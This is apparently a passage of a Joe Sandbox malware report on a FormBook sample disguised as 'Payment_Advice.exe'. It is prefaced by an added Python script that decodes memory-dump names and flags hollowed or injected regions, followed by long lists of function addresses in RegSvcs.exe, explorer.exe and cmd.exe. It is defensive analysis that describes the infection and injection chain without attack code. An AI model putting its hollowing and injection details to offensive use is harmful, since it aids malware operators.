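          The dump names in the Yara-match lines above encode where each FormBook hit was found. The Python below is an added example, not part of the Joe Sandbox report: it decodes those names and ranks the hits. Its field assignments are inferred from the values on this page and are assumptions of the example: the first field is the analysis process index, the same numbering the 6_2_/14_2_ function prefixes and the 14.2.RegSvcs.exe.400000.0 unpack name use; the fourth is the region base; the fifth takes the Win32 PAGE_* values seen here (0x04 on the explorer.exe string regions, 0x40 on the unpacked FormBook regions); the seventh takes MEM_PRIVATE 0x20000 or MEM_MAPPED 0x40000. Fields two, six and eight are carried through without interpretation, and process index 16 is not named in this section so it is reported as unknown. What the triage shows is the point worth taking from the list: the RegSvcs.exe hit sits in a writable and executable private region at the image base 0x400000, which is what a hollowed process looks like, while the explorer.exe hit is in a writable and executable mapped section, the footprint of injection by section mapping.

```python
"""Decode Joe Sandbox memory-dump names (the *.sdmp identifiers in this report)
and flag regions that look like injected or hollowed code.

Added example for this report; not Joe Sandbox code. Field meanings are
inferred from the names on this page and the Win32 constants they match
(fields 1, 4, 5, 7); fields 2, 6 and 8 are not interpreted.
"""
import re

SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<serial>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp"
)

# Win32 page-protection and region-type constants (MEMORY_BASIC_INFORMATION).
PAGE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
        0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
        0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Analysis process index -> image, read off this report's other lines: 6_2_*
# functions live in ewdbwwfpdh.bmp, "14.2.RegSvcs.exe.*" names the unpack, and the
# explorer.exe string hits are dumped under 0000000F. Index 16 (0x10) is not
# named in the excerpt, so it stays unknown (assumption: do not guess it).
PROCESS = {6: "ewdbwwfpdh.bmp", 14: "RegSvcs.exe", 15: "explorer.exe"}


def parse_sdmp(name):
    """Split one dump name into its fields; unknown constants are kept as hex."""
    m = SDMP_RE.search(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    pid = int(m["pid"], 16)
    protect = int(m["protect"], 16)
    mtype = int(m["type"], 16)
    return {
        "pid": pid,
        "process": PROCESS.get(pid, f"process {pid} (not named in excerpt)"),
        "phase": int(m["phase"], 16),      # carried through, not interpreted
        "serial": int(m["serial"]),
        "base": int(m["base"], 16),
        "protect": PAGE.get(protect & 0xFF, f"0x{protect:x}"),
        "type": MEM.get(mtype, f"0x{mtype:x}"),
        "f6": int(m["f6"], 16),            # not interpreted
        "f8": int(m["f8"], 16),            # not interpreted
    }


def is_suspicious(region):
    """Writable+executable memory that is not a loaded image: the shape of a
    hollowed image, a mapped-section injection, or an unpacked payload."""
    wx = region["protect"] in ("PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY")
    return wx and region["type"] != "MEM_IMAGE"


def triage(names):
    """Parse every dump name and return the suspicious regions, most telling
    first: a W+X region at the classic 0x400000 image base (hollowing) sorts
    before W+X regions elsewhere, then by process index and base address."""
    regions = [parse_sdmp(n) for n in names]
    flagged = [r for r in regions if is_suspicious(r)]
    flagged.sort(key=lambda r: (r["base"] != 0x400000, r["pid"], r["base"]))
    return flagged


# Dump names copied from this report's Yara-match lines (constructed input list).
REPORT_DUMPS = [
    "0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp",
    "00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp",
    "00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp",
    "00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp",
    "00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp",
    "0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "0000000F.00000002.3875577794.00000000106B5000.00000040.80000000.00040000.00000000.sdmp",
]

if __name__ == "__main__":
    for r in triage(REPORT_DUMPS):
        print(f"{r['process']:<34} base 0x{r['base']:08x}  {r['protect']}  {r['type']}")
```

          The read-write private regions in process 6 and the explorer.exe string heap are left out on purpose: they hold decrypted configuration and strings, which is why Yara matches there, but they are data, not the executing copy of the payload.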
          Source: initial sampleStatic PE information: Filename: Payment_Advice.exe
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050848E0_2_0050848E
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00516CDC0_2_00516CDC
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005040FE0_2_005040FE
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005140880_2_00514088
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005100B70_2_005100B7
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005171530_2_00517153
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005251C90_2_005251C9
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005162CA0_2_005162CA
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005032F70_2_005032F7
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005143BF0_2_005143BF
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0052D4400_2_0052D440
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050F4610_2_0050F461
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050C4260_2_0050C426
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005177EF0_2_005177EF
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050286B0_2_0050286B
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0052D8EE0_2_0052D8EE
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005319F40_2_005319F4
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050E9B70_2_0050E9B7
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00513E0B0_2_00513E0B
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050EFE20_2_0050EFE2
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00524F9A0_2_00524F9A
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001920076_2_00192007
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001980376_2_00198037
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_0018E0BE6_2_0018E0BE
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_0017E1A06_2_0017E1A0
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_0017225D6_2_0017225D
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001AA28E6_2_001AA28E
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001922C26_2_001922C2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_0018C59E6_2_0018C59E
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001FC7A36_2_001FC7A3
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001AE89F6_2_001AE89F
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001E291A6_2_001E291A
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001A6AFB6_2_001A6AFB
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001D8B276_2_001D8B27
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_0019CE306_2_0019CE30
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001A71696_2_001A7169
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_002051D26_2_002051D2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001792406_2_00179240
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001794996_2_00179499
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001917246_2_00191724
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00191A966_2_00191A96
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00179B606_2_00179B60
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00197BAB6_2_00197BAB
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00191D406_2_00191D40
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00197DDA6_2_00197DDA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041E81C14_2_0041E81C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040102F14_2_0040102F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040103014_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040120814_2_00401208
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041DB3B14_2_0041DB3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041D56314_2_0041D563
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041DDCE14_2_0041DDCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402D8814_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402D9014_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041E5BB14_2_0041E5BB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00409E4F14_2_00409E4F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00409E50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041DF7D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041DF1B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01768158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D0100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0177A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017981CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017A01AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017941A2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017A03E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016EE3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017602C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017A0591
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01792446
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01784420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0178E4F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01704750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016DC7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016FC6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016F6962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017AA9A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E2840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016EA840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0170E8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016C68B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01796BD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016DEA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0177CD1F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016EAD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016DADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016F8DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E0C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D0CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01780CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01754F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01700F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01782F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01722F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016ECFE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D2FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0175EFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E0E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179EE26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179EEDB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179CE93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016F2E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017AB16B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0171516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016CF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016EB1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017970E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179F0E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0178F0CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016CD34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0172739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017812ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016FB2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E52A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01797571
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017A95C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0177D5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016D1460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179F43F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179F7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01725630
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_017916CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016FB950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01775910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0174D800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E38E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179FB76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01755BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0171DBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016FFB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01753A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179FA49
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01797A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0178DAC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01725AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0177DAAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01781AA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01797D73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01791D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E3D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016FFDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01759C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179FCF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179FF09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016A3FD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016A3FD5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0179FFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E1F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016E9EB0
          Source: C:\Windows\explorer.exe Code function: 15_2_10196036
          Source: C:\Windows\explorer.exe Code function: 15_2_1018D082
          Source: C:\Windows\explorer.exe Code function: 15_2_10194912
          Source: C:\Windows\explorer.exe Code function: 15_2_1018ED02
          Source: C:\Windows\explorer.exe Code function: 15_2_1019A5CD
          Source: C:\Windows\explorer.exe Code function: 15_2_10197232
          Source: C:\Windows\explorer.exe Code function: 15_2_10191B30
          Source: C:\Windows\explorer.exe Code function: 15_2_10191B32
          Source: C:\Windows\explorer.exe Code function: 15_2_1069D232
          Source: C:\Windows\explorer.exe Code function: 15_2_1069C036
          Source: C:\Windows\explorer.exe Code function: 15_2_10693082
          Source: C:\Windows\explorer.exe Code function: 15_2_10697B30
          Source: C:\Windows\explorer.exe Code function: 15_2_10697B32
          Source: C:\Windows\explorer.exe Code function: 15_2_10694D02
          Source: C:\Windows\explorer.exe Code function: 15_2_1069A912
          Source: C:\Windows\explorer.exe Code function: 15_2_106A05CD
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A474B1
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A4540A
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A44C10
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A54875
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A64191
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A49144
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A6695A
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A53EB3
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A55A86
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A6769E
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A54EC1
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A47A34
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A4EE03
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A63E66
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A4D660
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A46E57
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A50BF0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A46B20
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00A50740
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_038503E6
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0379E3F0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0384A352
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_038102C0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03830274
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_038441A2
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_038501AA
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_038481CC
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03780100
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0382A118
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03818158
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03822000
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03790770
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037B4750
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0378C7C0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037AC6E0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03850591
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03790535
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0383E4F6
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03834420
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03842446
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03846BD7
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0384AB40
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0378EA80
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037A6962
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0385A9A6
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037929A0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0379A840
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03792840
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037BE8F0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037768B8
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0380EFA0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037B0F30
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037D2F28
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0379CFE0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03782FC8
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03832F30
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03804F40
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0384CE93
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03790E59
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0384EEDB
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0384EE26
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037A2E90
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0379AD00
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0378ADE0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0382CD1F
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037A8DBF
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03830CB5
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03790C00
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03780CF2
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0377D34C
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0384132D
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037D739A
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_038312ED
